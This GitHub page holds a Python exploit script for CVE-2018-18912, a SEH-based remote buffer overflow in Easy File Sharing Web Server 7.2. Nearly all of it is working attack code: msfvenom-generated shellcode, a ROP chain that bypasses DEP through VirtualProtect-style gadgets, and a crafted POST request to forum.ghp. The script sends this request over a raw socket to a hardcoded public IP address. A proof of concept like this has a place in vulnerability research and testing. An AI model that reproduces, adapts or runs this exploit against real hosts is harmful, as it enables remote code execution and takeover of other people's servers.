-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-18912.py
199 lines (173 loc) · 6.07 KB
/
CVE-2018-18912.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912
# 1. Description: An issue was discovered in Easy File Sharing (EFS) Web Server 7.2,
# A stack-based buffer overflow vulnerability occurs when an authenticated user sends
# a malicious POST request to forum.ghp upon creating a new topic in
# the forums, which allows remote attackers to execute arbitrary code.
# 2. Proof of Concept
import socket
import struct
HOST = '81.82.253.190'
PORT = 81
def p32(v):
return struct.pack("<L", v)
def send_malformed_buffer(data):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(data)
s.close()
#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python
shellcode = ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"
# ---====GADGETS====---
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2
ropchain = ''
buff = 'A' * 64
buff += 'BBBB' #nseh
buff += struct.pack("<L", stack_pivot_addr) #handler
buff += 'F' * 2348
ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81)
ropchain += p32(0x1001d626)
ropchain += p32(0x10021a3e)
#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)
#EDX = NewProtect(0x40)
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
#ECX = lpOldProtect (ptr to writable address address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)
#EBX = dwSize()
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)
#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)
#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)
#PUSAH
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4
ropchain += shellcode
buff += ropchain
request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"
send_malformed_buffer(request)